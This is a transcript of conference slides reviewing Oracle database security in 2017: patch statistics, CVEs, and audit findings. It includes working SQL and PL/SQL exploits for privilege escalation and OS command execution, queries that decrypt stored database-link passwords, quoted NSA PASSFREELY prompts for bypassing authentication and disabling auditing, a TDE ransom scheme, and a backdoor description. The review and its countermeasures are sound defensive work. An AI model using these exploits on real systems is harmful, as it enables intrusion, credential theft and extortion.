DOAG BEST OF 2017 · 2018-11-25 · Oracle Security Patches ! Krieg… ! Outlook 2018. Database...
Transcript of DOAG BEST OF 2017 · 2018-11-25 · Oracle Security Patches ! Krieg… ! Outlook 2018. Database...
Introduction
What will be shown in the next 45 minutes? ! Oracle Security Patches ! Krieg… ! Outlook 2018
Database Vulnerabilities and CPU
Again the patch situation is much better (down from 30 in 2016 to 14 in 2017)
Problem: At the moment only a few people are looking for security bugs in the database
Nowadays it’s rare that exploit code for databases is published
In 2017 prices for exploits went down
Jul 2017 CVE-2017-10202
https://vuldb.com/?id.103781
Current Price Estimation: $25k-$100k (0-day) / $5k-$25k (Today)
Oracle Vulnerabilities 2017
Number of vulnerabilities in Oracle database reduced again
! 14 findings in 2017 (2016:30 , 2015: 29, 2014: 43, 2013: 13 2012: 17)
! 4 remote exploitable bugs (2016: 8, 2015:3, 2014: 4, 2013: 7, 2012: 8 )
• January 2017 CPU (2 Vulnerabilities – 0 remote)
• April 2017 CPU (2 Vulnerabilities – 0 remote)
• July 2017 CPU (4 Vulnerabilities – 2 remote)
• October 2017 CPU (6 Vulnerabilities – 2 remote)
Dec 2016
Oracle 12.1 Exploit
* https://mahmoudhatem.wordpress.com/2016/12/14/sql-injection-vulnerability-cdbview-package/
Oracle 12.1 Exploit I
SQL> conn doag2017/doag2017 Connect durchgeführt.
SQL> select granted_role from user_role_privs;
CONNECT EXECUTE_CATALOG_ROLE
SQL> exec sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to doag2017''; RETURN ''1'';END; SELECT f as x FROM dual)-- ‚);
Oracle 12.1 Exploit II
SQL> select /*+WITH_PLSQL*/ * from ALL_CUBES;
1
SQL> select granted_role from user_role_privs;
CONNECT DBA EXECUTE_CATALOG_ROLE
January 2017
Oracle CPU January 2017 *
* http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
January 2017 CPU*
2 security fixes (No remote exploitable)
1 OJVM (CVSS 9.0)
1 RDBMS (CVSS 3.3)
* http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
March 2017Blog Entry: „Create any directory“=DBA=SYSDBA ! Ouch*
Blog Entry: CREATE ANY DIRECTORY threats : PDBs and the PATH_PREFIX clause**
Reverse engineering DB Link password decryption in PL/SQL***
* https://mahmoudhatem.wordpress.com/2017/03/03/create-any-directorydbasysdba-ouch/ ** https://mahmoudhatem.wordpress.com/2017/03/07/create-any-directory-threats-pdbs-and-the-path_prefix-clause/#more-6017 *** https://mahmoudhatem.wordpress.com/2016/12/08/reverse-engineering-db-link-password-decryption-in-plsql/
Exploit - Create any directory I
declare v_file utl_file.file_type; begin v_file:=utl_file.fopen('TEMP_DIR','execute_me.sh','w'); utl_file.put_line(v_file,'export PATH=/usr/local/bin:/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/sbin'); utl_file.put_line(v_file,'export ORACLE_HOME=/oracle11/product/11.2.0/dbhome_1'); utl_file.put_line(v_file,'export ORACLE_SID=testdb'); utl_file.put_line(v_file,'export PATH=$ORACLE_HOME/bin:$PATH'); utl_file.put_line(v_file,'ps -ef | grep pmon'); utl_file.fclose(v_file); end; /
Exploit - Create any directory IICREATE TABLE exec_command ( txt varchar2(4000) ) ORGANIZATION EXTERNAL ( TYPE ORACLE_LOADER DEFAULT DIRECTORY temp_dir ACCESS PARAMETERS ( RECORDS DELIMITED BY NEWLINE PREPROCESSOR exec_dir:'bash' FIELDS TERMINATED BY ',' MISSING FIELD VALUES ARE NULL ( txt ) ) LOCATION ('execute_me.sh') );
Escape from PDB without PATH_PREFIX
Create any directory privilege can be used to escape from PDBs. Oracle 12.1 introduced a new parameter PATH_PREFIX to avoid this attack but it was not working in 12.1
** https://mahmoudhatem.wordpress.com/2017/03/07/create-any-directory-threats-pdbs-and-the-path_prefix-clause/#more-6017
PDB without PATH_PREFIX SQL> create pluggable database pdb_prefix admin user pdbprefix identified by test123 PATH_PREFIX='/oracle/path_prefix/';
Pluggable database created.
SQL> alter session set container=pdb_prefix;
Session altered.
SQL> create directory temp_dir as '/tmp';
ORA-65254: invalid path specified for the directory
SQL> declare v_file utl_file.file_type; begin. …. utl_file.fclose(v_file); end; /
PL/SQL procedure successfully completed.
ll / -rw------- 1 oracle oinstall 205 Mar 7 14:41 execute_me.sh
PDB with PATH_PREFIX SQL> create pluggable database pdb_prefix admin user pdbprefix identified by test123 PATH_PREFIX='/oracle/path_prefix/';
Pluggable database created.
SQL> alter session set container=pdb_prefix;
Session altered.
SQL> create directory temp_dir as '/tmp';
ORA-65254: invalid path specified for the directory
SQL> create directory temp_dir as 'tmp';
Directory created.
SQL> declare v_file utl_file.file_type; begin. …. utl_file.fclose(v_file); end; /
PL/SQL procedure successfully completed.
ll /oracle/path_prefix -rw------- 1 oracle oinstall 205 Mar 7 14:41 execute_me.sh
Short history of DB Link Passwords*
<=10.2 Select password from sys.link$;
<=11.2.0.3 select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) from sys.link$;
** https://blogs.loopback.org/2014/06/db-link-passworter-metadaten-in-11-2-0-4/
Database Link Passwords 11.2-12.2
SELECT VALUE$ FROM SYS.PROPS$ WHERE name = 'NO_USERID_VERIFIER_SALT';
readelf -s oracle | grep ztcshpl_v6112105: 0000000010b9ee40 16384 OBJECT LOCAL DEFAULT 29 ztcshpl_v6
Run script db_link_password_decrypt.sql. **
exec db_link_password_decrypt('17B21F905CE739E2759E6FB99745650E','076C8B8463098676 E408141A154CF4C20AAF19A52CF7FEF3CD8A99830A82F9D8F129665C2F395DF4F30EBE1 5E48D78096E9BD8AC1012D24525982CE3C828BE298EA798D6FBD8A18379DEE803692B 773B86570AB2DA90EA121124D6D0F228818D18812B42C77AE6D0F4BF257627643EEC34F B9A6C2EF6185D7302EF30673A2F4C’);
* https://mahmoudhatem.wordpress.com/2016/12/08/reverse-engineering-db-link-password-decryption-in-plsql/** https://github.com/hatem-mahmoud/scripts/blob/master/db_link_password_decrypt.sql
April 2017
Oracle CPU April 2017* PassFreely Attack Bypasses Oracle Database Authentication** Shadow Brokers released toolset from the Equation Group aka. NSA
* http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html** https://www.bankinfosecurity.com/passfreely-attack-bypasses-oracle-database-authentication-a-9868
April 2017 CPU*
2 security fixes (0 remote exploitable)
1 SQL*Plus (CVSS 7.2)
1 OJVM (CVSS 5.3)
* http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
Shadow Brokers & NSA
On April 8th, 2017 The Shadow Brokers published a password for an encrypted dump. This dump contains several tools and exploits from the NSA Some of these exploits were used in later attacks (e.g. WannaCry) worldwide. Some of these tools affect databases (Oracle, SQL Server, SQLLite) The collection can be analyzed at https://github.com/misterch0c/shadowbroker
https://www.mnemonic.no/no/nyheter/2017/advisory---data-leakage-of-multiple-0-days-and-tools/
Some features of the NSA Toolkit
Oracle (Hacking) Plugins Disable Authentication using PASSFREELY (passwords are no longer checked)Support from Oracle 7.2.2.4.0 - latest version Disable Oracle Auditing to avoid traces Backdoor (?) - Oracle_Implant.dll Connection String Wizard Run a standard query Read the top 10 rows from every table Run a folder of queries Write Results to CSV Unicode support for foreign languages …
Already seen before at the DOAG conference
Disable Oracle Authentication (Best of Oracle Security 2011) Disable Oracle Auditing to avoid traces (Best of Oracle Security 2013) Backdoor (?) - Oracle_Implant.dll (Oracle Rootkits – eine neue Gefahr für Datenbanken?
User friendly
Xxx
Oracle can log in: 1) the Windows Application Event Logs 2) the listener.log file 3) its internal auditing mechanisms (including the Enterprise Manager console)
We're going to check the first two, but we can't run the detailed auditing check (#3) until you connect to the database.
Once this is finished, connect and run the Detailed Audit Check Query Plan!
Sound good?
Audit check complete, don't forget to run the Detailed Audit Check query plan after you connect!
If you'd like to disable auditing or enable PASSFREELY select one of the options below. Otherwise continue by pressing 0:
Run 'audit -disable all'
Run PASSFREELY (oracle -memcheck && oracle -open)
If you'd like to reenable auditing or remove PASSFREELY select one of the options below. Otherwise continue by pressing 0:
User friendly
XxxAny 'sys' logins will be logged even if using PASSFREELY! You'd better know what you're doing!
Are you sure you'd like to run 'audit -disable all'? (Make sure you don't have security auditing dorked!)
audit -disable all
DISABLING AUDITING FAILED!!! GO GET HELP!
User friendly
Xxx
Run the "oracle -memcheck" command to make sure that we can exploit this database.
Run the "oracle -crc" command to determine version
PROBLEM FOUND! There is an unknown version of Oracle running on the box!\n It could be that you just need an updated version of PASSFREELY. If not, you should grab the Oracle symbol file and executable that failed the CRC check above! OK, that wasn't it or at least I couldn't fix the problem. It could be that this is an unknown version of Oracle (verify that the CRC identified a version string) If the version isn't identified, then that is the problem, otherwise the problem is with PASSFREELY itself, so please contact the developer!
If the version is unknown, you should bring back the Oracle executable and the associated symbol file so that it can be incorporated it into this plugin.
User friendly
Xxx
You need to look over the file we just downloaded before proceeding! At a minimum you should review the section: Database Usage by User and Tablespace You should also check to see if there are Partitioned tables for any users of interest.
Do you want to survey the database users
Type of data sample 1 - Sample using Table Partitions 2 - Sample using Table Partitions without Row Counts 3 - Sample without using Table Partitions 4 - Sample without using Table Paritions and without Row Counts 5 - Just get Row Counts and Table Descriptions
Enter the number of the type of data sample you want
User friendly
Xxx
Do you have cracked passwords for a user of interest (OR for the SYS or SYSTEM user)? Do you want to perform database exports for any users? Are you wanting to include the Constraints and Indexes in the export file? (You probably only want this if exporting everything) What is the name of the user you want to export? Do you have the password for this user ($expuser)?
Done with database exports. Waiting for all files to complete downloading before continuing. Done. Do you want to delete the copy of $sidchoice\_Passwords_To_Crack.txt that is in the directory $tempDownloadDirPath?
Done with the Oracle survey ... that was easy!
Passfreely Supported versions! Oracle Database v 7.2.2.4.0 ! Oracle Database v 7.3.2.2.0 ! Oracle Database v 7.3.2.3.15 ! Oracle Database v 7.3.3.0.0 ! Oracle Database v 7.3.3.5.3 ! Oracle Database v 7.3.3.6.0 ! Oracle Database v 7.3.4.0.0 ! Oracle Database v 7.3.4.4.0 ! Oracle Database v 7.3.4.5.0 ! Oracle Database v 7.3.4.5.2 ! Oracle Database v 8.0.3.0.0 ! Oracle Database v 8.0.3.2.3 ! Oracle Database v 8.0.4.0.0 ! Oracle Database v 8.0.4.0.1 ! Oracle Database v 8.0.4.3.5 ! Oracle Database v 8.0.4.3.8 ! Oracle Database v 8.0.4.4.0 ! Oracle Database v 8.0.4.4.1 ! Oracle Database v 8.0.5.0.0 ! … ! Oracle Database v 11.1.0.7 ! Oracle Database v 11.1.0.7 Patch 1 ! Oracle Database v 11.1.0.7 Patch 10
! Oracle Database v 11.1.0.7 Patch 11 ! Oracle Database v 11.1.0.7 Patch 12 ! Oracle Database v 11.1.0.7 Patch 13 ! Oracle Database v 11.1.0.7 Patch 14 ! Oracle Database v 11.1.0.7 Patch 15 ! Oracle Database v 11.1.0.7 Patch 16 ! Oracle Database v 11.1.0.7 Patch 17 ! Oracle Database v 11.1.0.7 Patch 2 ! Oracle Database v 11.1.0.7 Patch 3 ! Oracle Database v 11.1.0.7 Patch 4 ! Oracle Database v 11.1.0.7 Patch 5 ! Oracle Database v 11.1.0.7 Patch 6 ! Oracle Database v 11.1.0.7 Patch 7 ! Oracle Database v 11.1.0.7 Patch 8 ! Oracle Database v 11.1.0.7 Patch 9 ! Oracle Database v 11.2.0.1 Base - 64-bit ! Oracle Database v 11.2.0.1 Patch 7 - 64-
bit ! Oracle Database v 11.2.0.2 Base - 64-bit
Countermeasures
Do not rely on standard auditing methods (e.g. Oracle Auditing) Certain Access Patterns (password hashes sys.user$) & certain tools (e.g. exp) without ticket should be logged and analyzed Minimize the number of services on your Oracle database server SYS/SYSTEM access of application data should be monitored
July 2017
Oracle CPU July 2017 *
* http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
July 2017 CPU*
4 security fixes (2 remote exploitable)
1 OJVM (CVSS 9.9)
1 DBMS_LDAP (CVSS 6.8, remote)
1 RAC (CVSS 6.8, remote)
1 RDBMS Security (CVSS 1.9)
* http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
Jul 2017 CVE-2014-3566
Problem: A security vulnerability affecting SSL v3.0 was recently publicly disclosed (Padding Oracle On Downgraded Legacy Encryption, or “Poodle”). This security vulnerability is the result of a design flaw in SSL v3.0. Note that this vulnerability does not affect TLS and is limited to SSL 3.0, which is widely considered as an obsolete protocol. This vulnerability has received the identifier CVE-2014-3566.
Reporter: Karthik Bhargavan and Gaetan Leurent
https://www.oracle.com/technetwork/topics/security/poodlecve-2014-3566-2339408.html
Jul 2017 CVE-2016-2183Problem: Karthik Bhargavan and Gaetan Leurent have unveiled a new attack on Triple-DES, SWEET32, Birthday attacks on 64-bit block ciphers in TLS and OpenVPN. It has been assigned CVE-2016-2183. Reporter: Karthik Bhargavan and Gaetan Leurent
https://www.openssl.org/blog/blog/2016/08/24/sweet32/
September 2017! Hacker attack more than 27.000 mongodb
databases*
https://www.heise.de/security/meldung/Hacker-Angriffe-auf-MongoDB-treffen-fast-27-000-Datenbanken-3822955.html
September 2017! Hacker attack more than 27.000 mongodb
databases*
https://www.heise.de/security/meldung/Hacker-Angriffe-auf-MongoDB-treffen-fast-27-000-Datenbanken-3822955.html
Encrypting DatabasesEscalate Privileges to DBA Enable TDE with an alter system command Encrypt important data (e.g. from business transactions). Due to the fact that it’s transparent the application does not detect the change Close the wallet after 1 week via a database job and send an email to the CEO... Depending on the backup concept of the database, the important data is encrypted and only accessible if you can open the wallet. The wallet password is not known to the DBA, only known to the blackmailer
Attacking Databases with Oracle TDE
! Add description
1Red-Database-Security GmbH
Abusing TDE for Blackmailing
1. Hacker login into the database
2. Become DBA
3. Create a wallet
4. Encrypt tables
5. Inform customer after shutdown
Data is still there but encrypted. And the keys are in the wallet.
October 2017
Oracle CPU October 2017 *
* http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
October 2017 CPU*
6 security fixes (2 remote exploitable)
1 Core RDBMS (CVSS 8.8)
1 Spatial (Apache Groovy) (CVSS 8.3, remote)
1 Java VM (CVSS 8.2)
1 WLM (Apache Tomcat) (CVSS 8.1, remote)
1 XMLDB (CVSS 6.5)
1 RDBMS Security (CVSS 2.3)
* http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
Oct 2017 CVE-2017-10292Problem: Creating Users with GRANT command not audited by „AUDIT CREATE USER“ Reporter: David Litchfield
Exploit:
GRANT DBA TO OOPSIEDAISY IDENTIFIED BY PA55W0RD1
Oct 2017 CVE-2016-6814Problem: It was found that a flaw in apache groovy library allows remote code execution wherever deserialization occurs in the application. It is possible for an attacker to craft a special serialized object that will execute code directly when deserialized. All applications which rely on serialization and do not isolate the code which deserializes objects are subject to this vulnerability. Reporter: Sam Thomas
Oct 2017 CVE-2016-8735The JmxRemoteLifecycleListener was not updated to take account of Oracle's fix for CVE-2016-3427. Therefore, Tomcat installations using this listener remained vulnerable to a similar remote code execution vulnerability. This issue has been rated as important rather than critical due to the small number of installations using this listener and that it would be highly unusual for the JMX ports to be accessible to an attacker even when the listener is used.
Reporter: Pierre Ernst
http://seclists.org/oss-sec/2016/q4/502http://blog.safebuff.com/2016/12/05/Apache-Tomcat-Remote-Code-Execution-CVE-2016-8735/
November 2017
DOAG 2017
Blog Entry „Injecting a Backdoor in an Oracle database“ *
* https://mahmoudhatem.wordpress.com/2017/11/17/injecting-a-backdoor-in-an-oracle-database/#more-8100 ** https://yurichev.com/writings/oracle.pdf
First rename the original function “snttread” to “Snttread” in the object file “sntt.o” and then inject a new wrapper function named “snttread” in the library “lib/libntcp12.a” which will do all the amazing stuff if it detect the magic word in this case “/bin/sh”.
Findings from Security Audits in 2017
Weak passwords Cleartext in audit logs Privilege Escalation via CREATE INDEX privilege (already shown 2016) Too many privileges …
Cleartext passwords in Oracle audit log
Sometimes the Oracle audit log contains cleartext passwords Review the content of the audit.log to identify and remove the passwords.
GDPR-DDOS(Potential) upcoming attack in 2018 Use social media (e.g. twitter) to organize a GDPR-DDOS by asking thousands of users to use their rights Art. 12 GDPR
What happens to your organization in 2018 if you get 10,000 GDPR Info request?
GDPR-Info WebsitesIt’s possible that new GDPR-Info websites will appear where customers can request all their information from the top-10,000 companies at once.
Could you image how much time it takes for companies to answer all these requests ?
Trends 2018
Migration to 12.2
GDPR / DSGVO. (May 2018)
More Data Discovery of personal data
More auditing projects
Integration Auditing with SIEM solutions